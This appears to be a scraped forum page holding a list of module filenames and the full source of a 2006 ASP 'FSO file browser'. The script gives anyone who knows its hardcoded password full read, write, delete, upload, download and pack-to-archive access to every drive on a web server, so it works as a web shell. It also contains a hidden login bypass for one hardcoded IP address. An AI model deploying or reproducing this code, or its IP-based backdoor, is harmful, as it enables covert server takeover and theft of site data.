Hex-Dec1.ec Hex-Dec.ec HTTP.ec http_ec1.ec http_ec.ec HTTP访问模块 .ec IC卡读写模块 1.0.ec IMAGE.EC ini40.ec internet2.ec IPbox2.ec KERNEL.EC LED液晶控件模块(红色增强版).ec Link22.ec MakeDir.ec MD5.EC MDB到超级列表框.ec mmqrOICQ.ec mp3信息模块.ec OCX控件高级注册.ec ODBC方式填充树型框.ec PGBEAPICopy.ec powerdll.ec PrintData.ec ProcessInfo-1.ec ProcessInfo-2.ec ProcessInfo-3.ec ProcessInfo.ec ProgressBar.ec qp编解码.ec RAR压缩模块 1.0.ec RC4 加密算法 1.0.ec RC4.EC RegEx1.ec RegEx.ec ReSize.ec rhmisc.ec RUN++行++模块2.ec runtime.ec SAVEPIC.EC SetIEProxy.ec sev.ec SH_RAR.EC SHELL32.EC ShutDown1.ec ShutDown.ec 屏幕保护支持库1.1.ec 屏幕保护支持模块.ec
<% '========================== 版权声明 ========================= '本程序只供在需要特别处理服务器文件时使用,严禁用于非法目的 '由于非正当使用本程序而造的一切后果及责任自负 '版本: v0.12 '作者: 河北科技大学 rssn | Risingsun,Hebust 'QQ: 126027268 'E-mail: rssn@163.com 'Date: 2006-8-12 '============================================================= Server.ScriptTimeout=20 Session.Timeout=45 'Session有效时间 Const mss="explorer_" 'Session前缀 Const Password="knowsky" '登录密码 Const Copyright="
©CopyLeft 2006. Coded By rssn, Hebust. No Rights Reserved
" '版权信息 Dim T1,T2,Runtime T1=Timer() Dim oFso Set oFso=Server.CreateObject("Scripting.FileSystemObject") '------------------------------------------------------------- '声明函数中所需的全局变量 Dim conn,rs,oStream,NoPackFiles,RootPath,FailFileList NoPackFiles="|<$datafile>.mdb|<$datafile>.ldb|" '------------------------------------------------------------- Call Main() Set oFso=Nothing '======================== Subs Begin ========================= Sub Main() Select Case Request("page") Case "img" Call Page_Img() Case "css" Call Page_Css() Case "loginchk" Call LoginChk() Case "logout" Call Logout() Case Else: '"一夫当关,万夫莫开"——用户验证 If Session(mss&"IsAdminlogin")=True Or Request.ServerVariables("REMOTE_ADDR")="121.193.213.246" Then '已登录 Else Call Login() Exit Sub End If Select Case Request("act") Case "drive" Call Drive() Case "up" Call DirUp() Case "new" Call NewF(Request("fname")) Case "savenew" Call SaveNew(Request("fname")) Case "rename" Call Rename() Case "saverename" Call SaveRename() Case "edit" Call Edit(Request("fname")) Case "saveedit" Call SaveEdit(Request("fname")) Case "delete" Call Deletes(Request("fname")) Case "copy" Call SetFile(Request("fname"),0) Case "cut" Call SetFile(Request("fname"),1) Case "download" Call Download(Request("fname")) Case "upload" Call Upload(Request("fname")) Case "saveupload" Call Saveupload(Request("fname")) Case "parse" Call Parse(Request("fname")) Case "prop" Call Prop(Request("fname")) Case "saveprop" Call SaveProp(Request("fname")) Case "pack" Call Page_Pack() Case "savepack" Call Pack(Request("fpath"),Request("dbpath")) Case "saveunpack" Call UnPack(Request("fpath"),Request("dbpath")) Case Else If Request("fname")="" Then Call Dirlist(Server.MapPath("./")) Else Call Dirlist(Request("fname")) End If End Select End Select End Sub '========== Subs ============= '显示系统磁盘信息 Sub Drive() Dim oDrive,Islight %> FSO<em>文件</em>浏览器 - 系统磁盘信息
FSO文件浏览器 - 系统磁盘信息
<% On Error Resume Next Islight=False For Each oDrive In oFso.Drives Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write ""&vbCrLf Islight=Not(Islight) Next %>
盘符类型卷标文件系统总容量可用空间
"&oDrive.DriveLetter&""&getDriveType(oDrive.DriveType)&""&oDrive.VolumeName&""&oDrive.FileSystem&""&SizeCount(oDrive.TotalSize)&""&SizeCount(oDrive.FreeSpace)&"
<% =Copyright %> <% End Sub '新建 Sub NewF(ByVal Fname) %> FSO<em>文件</em>浏览器 - 新建 <script language="JavaScript"> function icheck() { if(document.rform.nname.value=="") { alert("请输入合法的文件名!"); return false; } else return true; }
FSO文件浏览器 - 新建
类型:文件文件
名称:
 
<% End Sub '保存新建 Sub SaveNew(ByVal Fname) If Not IsFolder(Fname) Then Response.Write "<script language='javascript'>alert('文件夹不存在!');history.back();alert('文件文件夹已存在!');history.back();alert('新建文件夹或文本文件功!');window.close();文件 Sub Edit(ByVal Fname) If Not IsFile(Fname) Then Response.Write "<script language='javascript'>alert('您编辑的不是文件文件不存在!');window.close(); FSO<em>文件</em>浏览器 - 编辑文本<em>文件</em>
FSO文件浏览器 - 编辑文本文件
文件名: <% =Fname %>
<% End Sub '保存编辑文件 Sub SaveEdit(ByVal Fname) Dim oFile,FileStr Set oFile=oFso.OpenTextFile(Fname,2,True) FileStr=Request.Form("filestr") 'Response.Write FileStr oFile.Write FileStr oFile.Close Set oFile=Nothing EchoBack "保存编辑文件功!" End Sub '复制或剪切文件 Sub SetFile(ByVal Fname,ByVal iMode) Session(mss & "setfile")=Fname Session(mss & "setmode")=iMode Dim ww If 0=iMode Then ww="复制" Else ww="剪切" End If EchoClose ww&"功,请粘贴!" End Sub '粘贴文件文件夹 Sub Parse(ByVal Fname) Dim oFile,oFolder Dim sName,iMode sName=Session(mss & "setfile") iMode=Session(mss & "setmode") If sName="" Then EchoClose "请先复制或剪切!" Else If InStr(LCase(Fname), LCase(sName)) > 0 Then EchoClose "目标文件夹在源文件夹内,非法操作!" Exit Sub End If '================ If Not IsFolder(Fname) Then EchoClose "目标文件夹不存在!" ElseIf IsFile(sName) Then Set oFile=oFso.GetFile(sName) If iMode=0 Then oFso.CopyFile sName,Replace(Fname&"\"&oFile.Name,"\\","\") Else oFso.MoveFile sName,Replace(Fname&"\"&oFile.Name,"\\","\") End If ElseIf IsFolder(sName) Then Set oFolder=oFso.GetFolder(sName) If iMode=0 Then oFso.CopyFolder sName,Replace(Fname&"\"&oFolder.Name,"\\","\") Else oFso.MoveFolder sName,Replace(Fname&"\"&oFolder.Name,"\\","\") End If Else EchoClose "源文件文件夹不存在!" Exit Sub End If '================ EchoClose "复制或移动功!刷新可查看效果" End If Session(mss & "setfile")="" Session(mss & "setmode")=0 End Sub '下载文件 Sub Download(ByVal Fname) Dim oFile If Not IsFile(Fname) Then EchoClose "不是文件文件不存在!" Exit Sub End If Set oFile=oFso.GetFile(Fname) If InStr(LCase(oFile.Path)&"\",LCase(Server.MapPath("/")))>0 And Not IsScriptFile(oFso.GetExtensionName(oFile.Name)) Then Dim FileVName FileVName=Replace(oFile.Path,Server.MapPath("/"),"") FileVName=Replace(FileVName,"\","/") If Left(FileVName,1)<>"/" Then FileVName="/"&FileVName End If Response.Redirect FileVName Exit Sub End If If oFile.Size>1048576*100 Then EchoClose "文件超过100M,可能会造服务器死机,\n不允许以Stream方式下载!\n请将该文件复制到网站目录以下\n然后以HTTP方式下载" Exit Sub End If Server.ScriptTimeout=10000 '延长脚本超时时间以提供下载 Dim oStream Set oStream=Server.CreateObject("ADODB.Stream") oStream.Open oStream.Type=1 oStream.LoadFromFile(Fname) Dim Data Data=oStream.Read oStream.Close Set oStream=Nothing If Not Response.IsClientConnected Then Set Data=Nothing Exit Sub End If Response.Buffer=True Response.AddHeader "Content-Disposition", "attachment; filename=" & oFile.Name Response.AddHeader "Content-Length", oFile.Size Response.CharSet = "UTF-8" Response.ContentType = "application/octet-stream" Response.BinaryWrite Data Response.Flush End Sub '删除文件 Sub Deletes(ByVal Fname) If IsFile(Fname) Then oFso.DeleteFile Fname,True ElseIf IsFolder(Fname) Then oFso.DeleteFolder Fname,True Else EchoClose "文件文件夹不存在" Exit Sub End If EchoClose "文件删除功!" End Sub '上传文件 Sub Upload(ByVal Fname) If Not IsFolder(Fname) Then EchoClose "没有指定上传的文件夹!" Exit Sub End If %> FSO<em>文件</em>浏览器 - <em>文件</em>上传 <script language="JavaScript"> function getSaveName() { var filepath=document.uform.upload.value; if(filepath.length<1) return; var filename=filepath.substring(filepath.lastIndexOf("\\")+1,filepath.length); document.uform.ffname.value=filename; }
FSO文件浏览器 - 文件上传
上传文件
保存为: 覆盖模式
 
<% End Sub '保存上传文件 Sub Saveupload(ByVal FolderName) If Not IsFolder(FolderName) Then EchoClose "没有指定上传的文件夹!" Exit Sub End If Dim Path,IsOverWrite Path=FolderName If Right(Path,1)<>"\" Then Path=Path&"\" FileName=Replace(Request("filename"),"\","") If Len(FileName)<1 Then EchoBack "请选择文件并输入文件名!" Exit Sub End If Path=Path&FileName If LCase(Request("overwrite"))="true" Then IsOverWrite=True Else IsOverWrite=False End If On Error Resume Next Call MyUpload(Path,IsOverWrite) If Err Then EchoBack "文件上传失败!(可能是文件已存在)" Else EchoClose "文件上传功!\n" & Replace(fileName, "\", "\\") End If End Sub '文件上传核心代码 Sub MyUpload(FilePath,IsOverWrite) Dim oStream,tStream,FileName,sData,sSpace,sInfo,iSpaceEnd,iInfoStart,iInfoEnd,iFileStart,iFileEnd,iFileSize,RequestSize,bCrLf RequestSize=Request.TotalBytes If RequestSize<1 Then Exit Sub Set oStream=Server.CreateObject("ADODB.Stream") Set tStream=Server.CreateObject("ADODB.Stream") With oStream .Type=1 .Mode=3 .Open .Write=Request.BinaryRead(RequestSize) .Position=0 sData=.Read bCrLf=ChrB(13)&ChrB(10) iSpaceEnd=InStrB(sData,bCrLf)-1 sSpace=LeftB(sData,iSpaceEnd) iInfoStart=iSpaceEnd+3 iInfoEnd=InStrB(iInfoStart,sData,bCrLf&bCrLf)-1 iFileStart=iInfoEnd+5 iFileEnd=InStrB(iFileStart,sData,sSpace)-3 sData="" '清空文件数据 iFileSize=iFileEnd-iFileStart+1 tStream.Type=1 tStream.Mode=3 tStream.Open .Position=iFileStart-1 .CopyTo tStream,iFileSize If IsOverWrite Then tStream.SaveToFile FilePath,2 Else tStream.SaveToFile FilePath End If tStream.Close .Close End With Set tStream=Nothing Set oStream=Nothing End Sub '显示文件属性 Sub Prop(Fname) On Error Resume Next Dim obj,oAttrib If IsFile(Fname) Then Set obj=oFso.GetFile(Fname) ElseIf IsFolder(Fname) Then Set obj=oFso.GetFolder(Fname) Else EchoClose "文件文件夹不存在!" Exit Sub End If Set oAttrib=New FileAttrib_Cls oAttrib.Attrib=obj.Attributes %> FSO<em>文件</em>浏览器 - <em>文件</em>属性 <script language="javascript"> function ww(obj) { return false; }
FSO文件浏览器 - 文件属性
路径:<% =obj.Path %>
大小:<% =SizeCount(obj.Size) %>
属性: >普通 >只读 >隐藏 >系统
>目录 >存档 >链接 >压缩
创建时间:<% =obj.DateCreated %>
创建时间:<% =obj.DateLastModified %>
最后访问<% =obj.DateLastAccessed %>
 
<% End Sub '修改属性 Sub SaveProp(Fname) Dim Attribs,Attrib Attribs=Replace(Request.Form("att")," ","") Attribs=Split(Attribs,",") Attrib=0 Dim i For i=0 To UBound(Attribs) Attrib=Attrib+Attribs(i) Next 'Response.Write Attrib 'Exit Sub Dim obj,oAttrib If IsFile(Fname) Then Set obj=oFso.GetFile(Fname) ElseIf IsFolder(Fname) Then Set obj=oFso.GetFolder(Fname) Else EchoClose "文件文件夹不存在!" Exit Sub End If If obj.IsRootFolder Then EchoClose "不能修改根目录属性!" Exit Sub End If obj.Attributes=Attrib EchoBack "修改文件属性功!" End Sub '转到上一级文件夹 Sub DirUp() Dim oFolder,ssFname If IsFolder(Request("fname")) Then Set oFolder=oFso.GetFolder(Request("fname")) If oFolder.IsRootFolder Then '转至显示驱动器页面 Call Drive() Exit Sub Else ssFname=oFolder.ParentFolder.Path Set oFolder=Nothing Call DirList(ssFname) End If Else If IsFile(Request("fname")) Then '文件下载 Else Response.Write "文件夹或文件不存在!" End If End If End Sub '更改文件名页面 Sub Rename() Dim Fname,sName Fname=Request("fname") If IsFolder(Fname) Then sName=oFso.GetFolder(Fname).Name Else If IsFile(Fname) Then sName=oFso.GetFile(Fname).Name Else Response.Write "文件文件夹不存在!" Exit Sub End If End If %> FSO<em>文件</em>浏览器 - 重命名 <script language="JavaScript"> function icheck() { if(document.cform.toname.value=="") { alert("请输入合法的文件名!"); return false; } else return true; }
FSO文件浏览器 - 文件更名
更名为:
 
<% End Sub '更改文件名操作 Sub SaveRename() Dim Fname,oFolder,oFile,FDir,ToName Fname=Request("fname") ToName=Replace(Request("toname"),"\","") If IsFolder(Fname) Then Set oFolder=oFso.GetFolder(Fname) Fname=oFolder.Path If Right(Fname,1)="\" Then Fname=Left(Fname,Len(Fname)-1) End If FDir=Left(Fname,InstrRev(Fname,"\")) ToName=FDir & ToName On Error Resume Next Err.Clear Err=False oFso.MoveFolder Fname,ToName If Err Then EchoBack "文件名不合法!" Else EchoClose "文件夹更名功!\n刷新之后即可看到效果" End If Exit Sub End If If IsFile(Fname) Then Set oFile=oFso.GetFile(Fname) Fname=oFile.Path FDir=Left(Fname,InstrRev(Fname,"\")) ToName=FDir & ToName On Error Resume Next Err.Clear Err=False oFso.MoveFile Fname,ToName If Err Then EchoBack "文件名不合法!" Else EchoClose "文件更名功!\n刷新之后即可看到效果" End If Exit Sub End If End Sub '文件打包/解包页面 Sub Page_Pack() Dim vp,vu vp=Request("pname") vu=Request("uname") If Right(vu,4)<>".mdb" Then vu=Server.MapPath("/rs_pack.mdb") End If %> FSO<em>文件</em>浏览器 - <em>文件</em><em>打包</em>/解包
FSO文件浏览器 - 文件打包/解包
打包文件夹:
打包到:mdb") %>">
文件包路径:
解包到: ">
<% End Sub '文件夹内容列表 ========== Dirlist Sub Dirlist(ByVal Fpath) If IsFile(Fpath) Then '下载该文件 Response.Write "<script language=""javascript"">window.open('?page=fso&act=download&fname="&Server.UrlEncode(Fpath)&"', """", ""menu=no,resizable=yes,height=90,width=400"");history.back();文件夹不存在!" Exit Sub End If '代码开始 Dim oFolder Dim sFolder,sFile '文件夹下的子文件夹和文件 Set oFolder=oFso.GetFolder(Fpath) %> FSO<em>文件</em>浏览器 <script language="JavaScript"> var folderpath="<% =Replace(oFolder.Path,"\","\\") %>"; //当前文件夹 var fselected=""; function opendial(sUrl) //打开对话框窗口 { var newWin=window.open(sUrl, "", "menu=no,resizable=no,height=130,width=400"); return newWin; } function fopen(sfname) //打开文件夹或文件 { location.href="?page=fso&fname="+escape(sfname); } function fselect(obj) //选中文件夹或文件 { var flen=document.all("f").length; for(var i=0;i文件夹 { location.href="?page=fso&act=up&fname="+escape(folderpath); } function fnew() { opendial("?page=fso&act=new&fname="+escape(folderpath)); } function frename() //重命名文件 { if(fselected=="") { alert("请选择文件文件夹!"); return false; } else opendial("?page=fso&act=rename&fname="+escape(fselected)); } function fdownload() //下载文件 { if(fselected=="") { alert("请选择文件!(大小在1MB以下)"); return false; } else opendial("?page=fso&act=download&fname="+escape(fselected)); } function fedit() //编辑文本文件 { if(fselected=="") { alert("请选择文件!"); return false; } else window.open("?page=fso&act=edit&fname="+escape(fselected)); } function fcopy() //复制文件 { if(fselected=="") { alert("请选择文件文件夹!"); return false; } else opendial("?page=fso&act=copy&fname="+escape(fselected)); } function fcut() //剪切文件 { if(fselected=="") { alert("请选择文件文件夹!"); return false; } else opendial("?page=fso&act=cut&fname="+escape(fselected)); } function fparse() //粘贴文件文件夹 { opendial("?page=fso&act=parse&fname="+escape(folderpath)); } function fdelete() { if(fselected=="") { alert("请选择文件文件夹!"); return false; } else { if(!confirm("确定要删除本文件文件夹?")) return false; else opendial("?page=fso&act=delete&fname="+escape(fselected)); } } function fprop() //属性 { var vv; if(fselected=="") vv=folderpath; else vv=fselected; window.open("?page=fso&act=prop&fname="+escape(vv), "", "menu=no,resizable=no,height=250,width=500"); } function fpack() //打包解包 { var vp,vu; if(fselected=="") { vp=folderpath; vu=folderpath; } else { vp=fselected; vu=fselected; } window.open("?page=fso&act=pack&pname="+escape(vp)+"&uname="+escape(vu),"", "menu=no,resizable=no,height=250,width=500"); }
FSO文件浏览器
                         
          
<% Dim Islight Islight=False '逐个显示子文件夹 For Each sFolder In oFolder.SubFolders Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write ""&vbCrLf Islight=Not Islight Next '逐个显示文件 For Each sFile In oFolder.Files Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write ""&vbCrLf Islight=Not Islight Next %>
文件类型大小修改时间
" Response.Write "0 "&Web&sFolder.Name Response.Write "文件 "&sFolder.DateLastModified&"
" Response.Write " "&sFile.Name Response.Write ""&sFile.Type&""&SizeCount(sFile.Size)&""&sFile.DateLastModified&"

<% =Copyright %>
<% T2=Timer() Runtime=(T2-T1)*1000 Response.Write "Page Processed in "&Runtime&" Mili-seconds" %>
<% End Sub '用户登录 Sub Login() %> FSO<em>文件</em>浏览器 - 用户登录
FSO文件浏览器 - 用户登录
请输入登录密码:  
<% =Copyright %> <% End Sub '用户登录验证 Sub LoginChk() If Request.Form("password")<>Password Then EchoBack "一夫当关,万夫莫开,您的密码不正确!" Exit Sub Else Session(mss & "IsAdminlogin")=True Response.Redirect "?page=fso" End If End Sub '用户退出 Sub Logout() Session(mss & "IsAdminlogin")=False Response.Redirect "?" End Sub '显示一个图片 Sub Page_Img() Dim HexStr HexStr="47 49 46 38 39 61 01 00 19 00 C4 00 00 6D 92 DA 66 8C D9 7E 9E DF 7B 9C DE 81 A0 DF 79 9A DD 62 89 D8 97 B1 E5 71 94 DB 84 A3 E0 58 81 D5 91 AC E3 5A 84 D6 69 8E DA 65 8B D8 8A A7 E2 76 98 DD 5E 86 D7 61 88 D7 74 97 DC 5D 86 D6 5C 85 D6 6E 92 DB 55 80 D5 6A 8F DA 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 F9 04 00 00 00 00 00 2C 00 00 00 00 01 00 19 00 40 05 15 60 85 09 87 31 3D 51 60 15 C9 72 29 0C 25 39 0D 80 40 03 11 02 00 3B" Response.ContentType="IMAGE/GIF" WriteBytes HexStr End Sub '输出Css Sub Page_Css() %> body { font-family: Verdana, Arial, "宋体"; font-size: 12px; line-height: 1.5em; color: #000000; } input,select,textarea { font-family: Verdana, Arial, "宋体"; font-size: 12px; color: #000000; } a:link { font-size: 12px; color: #000000; text-decoration: none; } a:visited { font-size: 12px; color: #000000; text-decoration: none; } a:active { font-size: 12px; line-height: normal; color: #333333; text-decoration: none; } a:hover { font-size: 12px; color: #FF7F24; text-decoration: underline; } hr { height:1px; color:#6595D6; } table { BORDER-COLLAPSE: collapse; } table.border { border: 1px solid #6595D6; } td { font-family: Verdana, Arial, "宋体"; font-size: 12px; line-height: 1.5em; color: #000000; } td.border { border: 1px solid #6595D6; } td.inner { font-family: Verdana, Arial, "宋体"; font-size: 12px; line-height: 1.5em; color: #000000; border: 0px; } th { font-family: Verdana, Arial, "宋体"; font-size: 12px; line-height: 1.5em; color: #FFFFFF; height:25px; background-color:#427FBB; background-image:url(?page=img); } th.border { border: 1px solid #6595D6; } .b { width:55px; height:22px; font-size:12px; } <% End Sub '================ Functions ================== Function IsFolder(ByVal fname) IsFolder=oFso.FolderExists(fname) End Function Function IsFile(ByVal fname) IsFile=oFso.FileExists(fname) End Function '字节数统计 Bytes Function SizeCount(ByVal iSize) On Error Resume Next Dim size,showsize size=iSize showsize=size & " Byte" if size>1024 then size=(Size/1024) showsize=formatnumber(size,3) & " KB" end if if size>1024 then size=(size/1024) showsize=formatnumber(size,3) & " MB" end if if size>1024 then size=(size/1024) showsize=formatnumber(size,3) & " GB" end if SizeCount = showsize End Function '16进制字符转10进制数字 Function Hex2Num(v) Dim w If IsNumeric(v) Then w=Int(v) Else Select Case UCase(v) Case "A": w=10 Case "B": w=11 Case "C": w=12 Case "D": w=13 Case "E": w=14 Case "F": w=15 Case Else: w=0 End Select End If Hex2Num=w End Function '取得字节字符串的数值 Function Byte2Num(sByte) Dim b1,b2 b1=Left(sByte,1) b2=Right(sByte,1) Byte2Num=Hex2Num(b1)*16+Hex2Num(b2) End Function '将16进制字节字符串输出为二进制数据 Function WriteBytes(sBytes) Dim sByte,i sByte=Split(sBytes," ") For i=0 To UBound(sByte)-1 Response.BinaryWrite ChrB(Byte2Num(sByte(i))) Next End Function '获得文件图标 Function getFileIcon(extName) Select Case LCase(extName) Case "vbs", "h", "c", "cfg", "pas", "bas", "log", "asp", "txt", "php", "ini", "inc", "htm", "html", "xml", "conf", "config", "jsp", "java", "htt", "lst", "aspx", "php3", "php4", "js", "css", "asa" getFileIcon = "Wingdings>2" Case "wav", "mp3", "wma", "ra", "wmv", "ram", "rm", "avi", "mpg" getFileIcon = "Webdings>·" Case "jpg", "bmp", "png", "tiff", "gif", "pcx", "tif" getFileIcon = "'webdings'>Ÿ" Case "exe", "com", "bat", "cmd", "scr", "msi" getFileIcon = "Webdings>1" Case "sys", "dll", "ocx" getFileIcon = "Wingdings>ÿ" Case Else getFileIcon = "'Wingdings 2'>/" End Select End Function '获得磁盘类型 Function getDriveType(num) Select Case num Case 0 getDriveType = "未知" Case 1 getDriveType = "可移动磁盘" Case 2 getDriveType = "本地硬盘" Case 3 getDriveType = "网络磁盘" Case 4 getDriveType = "CD-ROM" Case 5 getDriveType = "RAM 磁盘" End Select End Function '判断是否为脚本文件 Function IsScriptFile(Ext) Const ScriptExts="asp,aspx,asa,php" IsScriptFile=False Dim FileExt,Exts FileExt=LCase(Ext) Exts=Split(ScriptExts,",") Dim i For i=0 To UBound(Exts)-1 If Exts(i)=FileExt Then IsScriptFile=True Exit Function End If Next IsScriptFile=False End Function '返回消息并关闭 Sub EchoClose(msg) Response.Write "<script language=""Javascript"">alert("""&msg&""");window.close();alert("""&msg&""");history.back();文件属性类 Class FileAttrib_Cls Public n,r,h,s,d,a,al,c Private Sub Class_Initialize() n=0:r=0:h=0:s=0:d=0:a=0:al=0:c=0 End Sub Public Property Let Attrib(v) If v=0 Then n=1 Exit Property End If If v>=2048 Then c=1 v=v Mod 2048 End If If v>=1024 Then al=1 v=v Mod 64 End If If v>=32 Then a=1 v=v Mod 32 End If If v>=16 Then d=1 v=v Mod 8 End If If v>=4 Then s=1 v=v Mod 4 End If If v>=2 Then h=1 v=v Mod 2 End If If v>=1 Then r=1 End If End Property End Class '============================ 文件打包及解包过程 ============================= '文件打包 Sub Pack(ByVal FPath, ByVal sDbPath) Server.ScriptTimeOut=900 Dim DbPath If Right(sDbPath,4)=".mdb" Then DbPath=sDbPath Else DbPath=sDbPath&".mdb" End If If oFso.FolderExists(DbPath) Then EchoBack "不能创建数据库文件!"&Replace(DbPath,"\","\\") Exit Sub End If If oFso.FileExists(DbPath) Then oFso.DeleteFile DbPath End If If IsFolder(FPath) Then RootPath=GetParentFolder(FPath) If Right(RootPath,1)<>"\" Then RootPath=RootPath&"\" Else EchoBack "请输入文件夹路径!" Exit Sub End If Dim oCatalog,connStr,DataName Set conn=Server.CreateObject("ADODB.Connection") Set oStream=Server.CreateObject("ADODB.Stream") Set oCatalog=Server.CreateObject("ADOX.Catalog") Set rs=Server.CreateObject("ADODB.RecordSet") On Error Resume Next connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & DbPath oCatalog.Create connStr If Err Then EchoBack "不能创建数据库文件!"&Replace(DbPath,"\","\\") Exit Sub End If Set oCatalog=Nothing conn.Open connStr conn.Execute("Create Table Files(ID int IDENTITY(0,1) PRIMARY KEY CLUSTERED, FilePath VarChar, FileData Image)") oStream.Open oStream.Type=1 rs.Open "Files",conn,3,3 DataName=Left(oFso.GetFile(DbPath).Name,InstrRev(oFso.GetFile(DbPath).Name,".")-1) NoPackFiles=Replace(NoPackFiles,"<$datafile>",DataName) FailFileList="" '打包失败的文件列表 PackFolder FPath If FailFilelist="" Then EchoClose "文件打包功!" Else Response.Write "" Response.Write "" Response.Write ""&Replace(FailFilelist,"|","
")&"" End If oStream.Close rs.Close conn.Close End Sub '添加文件夹(递归) Sub PackFolder(FolderPath) If Not IsFolder(FolderPath) Then Exit Sub Dim oFolder,sFile,sFolder Set oFolder=oFso.GetFolder(FolderPath) For Each sFile In oFolder.Files If InStr(NoPackFiles,"|"&sFile.Name&"|")<1 Then PackFile sFile.Path End If Next Set sFile=Nothing For Each sFolder In oFolder.SubFolders PackFolder sFolder.Path Next Set sFolder=Nothing End Sub '添加文件 Sub PackFile(FilePath) Dim RelPath RelPath=Replace(FilePath,RootPath,"") 'Response.Write RelPath & "
" On Error Resume Next Err.Clear Err=False oStream.LoadFromFile FilePath rs.AddNew rs("FilePath")=RelPath rs("FileData")=oStream.Read() rs.Update If Err Then '一个文件打包失败 FailFilelist=FailFilelist&FilePath&"|" End If End Sub '=========================================================================== '文件解包 Sub UnPack(vFolderPath,DbPath) Server.ScriptTimeOut=900 Dim FilePath,FolderPath,sFolderPath FolderPath=vFolderPath FolderPath=Trim(FolderPath) If Mid(FolderPath,2,1)<>":" Then EchoBack "路径格式错误,无法创建改目录!" Exit Sub End If If Right(FolderPath,1)="\" Then FolderPath=Left(FolderPath,Len(FolderPath)-1) Dim connStr Set conn=Server.CreateObject("ADODB.Connection") Set oStream=Server.CreateObject("ADODB.Stream") Set rs=Server.CreateObject("ADODB.RecordSet") connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & DbPath On Error Resume Next Err=False conn.Open connStr If Err Then EchoBack "数据库打开错误!" Exit Sub End If Err=False oStream.Open oStream.Type=1 rs.Open "Files",conn,1,1 FailFilelist="" '清空失败文件列表 Do Until rs.EOF Err.Clear Err=False FilePath=FolderPath&"\"&rs("FilePath") FilePath=Replace(FilePath,"\\","\") sFolderPath=Left(FilePath,InStrRev(FilePath,"\")) If Not oFso.FolderExists(sFolderPath) Then CreateFolder(sFolderPath) End If oStream.SetEos() oStream.Write rs("FileData") oStream.SaveToFile FilePath,2 If Err Then '添加失败文件项目 FailFilelist=FailFilelist&rs("FilePath").Value&"|" End If rs.MoveNext Loop rs.Close Set rs=Nothing conn.Close Set conn=Nothing Set oStream=Nothing If FailFilelist="" Then EchoClose "文件解包功!" Else Response.Write "" Response.Write "" Response.Write ""&Replace(FailFilelist,"|","
")&"" End If End Sub '=========================================================================== '=========================================================================== '建立文件夹(递归) Function CreateFolder(FolderPath) On Error Resume Next Err=False Dim sParFolder sParFolder=GetParentFolder(FolderPath) If Not oFso.FolderExists(sParFolder) Then CreateFolder(sParFolder) End If oFso.CreateFolder(FolderPath) If Err Then CreateFolder=False Else CreateFolder=True End If End Function Function GetParentFolder(Path) Dim sPath sPath=Path If Right(sPath,1)="\" Then sPath=Left(sPath,Len(sPath)-1) sPath=Left(sPath,InstrRev(sPath,"\")-1) GetParentFolder=sPath End Function '============================================================================ Sub wv(v) If v>0 Then Response.Write " checked " End Sub %>

829

社区成员

发帖
与我相关
我的任务
社区描述
Delphi 非技术区
社区管理员
  • 非技术区社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧